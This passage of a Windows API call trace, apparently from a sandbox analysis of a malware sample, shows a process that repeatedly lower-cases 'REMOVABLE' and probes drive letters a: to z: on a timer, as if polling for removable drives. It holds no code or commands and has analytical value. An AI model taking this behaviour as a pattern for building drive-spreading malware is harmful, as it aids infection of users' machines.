[0217.109] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.109] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.109] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.110] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.110] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0217.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.111] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.111] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.111] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.111] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.111] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.112] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.112] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.115] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.115] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.115] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.115] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.116] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.117] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.117] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.117] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.117] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.117] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.118] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.119] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.119] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.119] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.119] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.119] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.120] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.120] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.120] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.120] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.120] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.120] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0217.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0217.121] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0217.121] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.122] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.122] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.122] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.123] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.123] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.123] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.123] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.123] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.123] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.124] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.124] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.124] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.124] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.124] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.125] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.126] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.127] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.127] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.127] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.128] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.128] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.128] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.128] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.128] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.129] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.131] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.131] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.131] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.131] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.131] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.132] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0217.132] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0217.132] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.133] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.133] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.133] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.133] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0217.134] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.134] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.134] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.135] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.135] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.135] GetDriveTypeW 